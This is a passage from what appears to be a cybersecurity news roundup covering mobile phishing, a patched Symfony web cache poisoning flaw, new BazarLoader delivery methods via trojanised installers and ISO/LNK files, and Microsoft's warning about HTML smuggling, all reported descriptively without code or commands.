The top trend experts noticed was using of mobile technology for these phishing attacks like WhatsApp, SMS, and other services. Threat actors have also been using these techniques as a response to strict email security solutions. A mobile technology is said to be less secured compared to a desktop endpoint when it faces a phishing attack. Even if the mobile has a business email app, mediums like Whatsapp and SMS will escape any anti-phishing security that the device has. 

Cybercriminals might also combine mobile messaging and emails in a single attack, for instance, sending a phishing mail including QR code which is scanned by a mobile, doing so results in escaping detection and reaching the mobile endpoint. "Mobile-based phishing attacks are also harder to identify due to mobile devices’ smaller screen and simplified layout, compounding the lack of security solutions on mobile," reports Help Net Security.

Symfony PHP Framework has a Cache Poisoning Bug

 

Websites built on the Symfony framework were vulnerable to web cache poisoning attacks due to misuse of HTTP headers. Symfony is a popular PHP framework for web applications that has received over 200 million downloads in the past. Web cache poisoning attacks were discovered to be vulnerable on the platform, possibly exposing sensitive information such as users' IP addresses. 

Web cache poisoning is a sophisticated technique in which an attacker takes advantage of a web server's and cache's behavior to provide a malicious HTTP response to other users. Web cache poisoning is divided into two stages. To begin, the attacker must figure out how to get a response from the back-end server that has a harmful payload. They must ensure that their response is stored and then served to the intended victims once they have succeeded. 

A poisoned web cache has the potential to be a catastrophic means of disseminating a variety of attacks, including XSS, JavaScript injection, open redirection, and so on. 

Manipulation of unkeyed inputs, such as headers, is at the heart of any web cache poisoning attack. When evaluating whether or not to serve a cached response to a user, web caches disregard unkeyed inputs. Because of this behavior, threat actors can use them to inject their payload and elicit a "poisoned" response, which, if cached, will be served to all users with the corresponding cache key. 

The bug was created when a Symfony-based website was running behind a proxy or load-balancer, which has since been resolved. Developers can tell Symfony to look for X-Forwarded-* headers in these circumstances, which provide further information about the client such the original IP address, protocol, and port. A trusted_headers allow list is used by Symfony to limit allowed headers and prevent web cache poisoning attacks. Symfony's developers added support for the X-Forwarded-Prefix header in version 5.2, which attaches information about the request's original path-base. 

The flaw was in the sub-request feature, which allows developers to render and serve a tiny section of a page instead of the entire page, according to a GitHub advisory. Even though it wasn't on their trusted headers list, the X-Forwarded-Prefix header was processed by 'sub-requests.' By forging malicious sub-requests with the X-Forwarded-Prefix header and having them cached in cache servers, malicious actors could perform web cache poisoning attacks.

BazarLoader's Arrival and Delivery Vectors now Include Compromised Installers and ISO

 

While the number of BazarLoader detections increased in the third quarter, two new delivery methods have been added to the list of delivery mechanisms used by threat actors for data theft and ransomware. Malicious actors combine BazarLoader with genuine products, hence one of the approaches involves using corrupted software installers. The second approach involves loading a Windows link (LNK) and dynamic link library (DLL) payload into an ISO file. The Americans have been discovered to have the highest amount of BazarLoader attacks.

Researchers detected the tainted versions of VLC and TeamViewer software included with BazarLoader, according to reports. While the original delivery technique has yet to be discovered, it's possible that the use of these packages is part of a bigger social engineering campaign aimed at convincing individuals to download and install infected installers. A BazarLoader executable is dumped and executed when the installers load. It's also one of the most noticeable differences from recent BazarLoader arrival approaches, which appeared to support dynamic link libraries (DLL).

Meanwhile, a distribution technique based on ISO files has been uncovered, in which the BazarLoader DLL is launched via DLL and LNK files included in the ISO files. The LNK file uses a folder icon to fool the user into double-clicking it, letting the BazarLoader DLL programme to be launched. The "EnterDLL" export function, which was recently used by BazarLoader, is then called. Before injecting itself into a suspended MS Edge process, Rundll32.exe launches the malicious DLL and connects to the C&C server. 

As threat actors change their assault techniques to avoid detection, the number of arrival mechanism modifications utilized in BazarLoader campaigns continues to rise. Due to the limitations of single detection methods, both techniques are significant and still work despite their lack of novelty. 

While the usage of compromised installers has been seen with other malware, the huge file size might still pose a problem for detection systems, such as sandboxes, that apply file size constraints. LNK files used as shortcuts, on the other hand, will very certainly be obfuscated due to the additional layers generated between the shortcut and the malicious files. 

BazarLoader will continue to evolve as a standalone information stealer, an initial access malware-as-a-service (MaaS) for other malware operators, and a secondary payload distribution mechanism for even more destructive attacks like modern ransomware. For unknown risks, security teams must deploy multi-layered systems capable of pattern recognition and behavior monitoring, as well as making monitoring and tracking for known dangers more evident based on known data.

Microsoft Issued a Warning About a Rise in HTML Smuggling Phishing Attacks

 

Malware campaigns that use HTML smuggling to transmit banking malware and remote access trojans (RAT) have increased, according to Microsoft. While HTML smuggling is not a new tactic, it is increasingly being employed by threat actors to avoid detection, such as the Nobelium hacking organization behind the SolarWinds attacks. 

HTML smuggling is a nasty method that gets through traditional network perimeter security measures like web proxies and email gateways because the malware is created within the network after an employee opens a web page or attachment that contains a malicious HTML script. As a result, even if gateway devices check for suspicious EXE, ZIP, or Office documents, a company's network can be compromised. 

"When a target user opens the HTML in their web browser, the browser decodes the malicious script, which, in turn, assembles the payload on the host device. Thus, instead of having a malicious executable pass directly through a network, the attacker builds the malware locally behind a firewall," Microsoft warns. 

HTML smuggling is a phishing method that uses HTML5 and JavaScript to encrypt strings in an HTML attachment or webpage to hide harmful payloads. When a user opens an attachment or clicks a link, the browser decodes these strings. A phishing HTML attachment, for example, could include a harmless link to a well-known website, making it appear non-malicious. When a user clicks on the link, however, JavaScript decodes an encrypted or encoded string in the link and converts it into a harmful attachment that is downloaded instead. 

Because the malicious payload is encoded at first, security software does not recognize it as harmful. Furthermore, because JavaScript assembles the payload on the target machine, it gets around any firewalls and security measures that would normally stop the malicious file from getting past the perimeter. 

"Disabling JavaScript could mitigate HTML smuggling created using JavaScript Blobs. However, JavaScript is used to render business-related and other legitimate web pages," Microsoft explains. "In addition, there are multiple ways to implement HTML smuggling through obfuscation and numerous ways of coding JavaScript, making the said technique highly evasive against content inspection." Between July and August, Microsoft discovered an increase in HTML smuggling in campaigns that transmit RATs like AsyncRAT/NJRAT.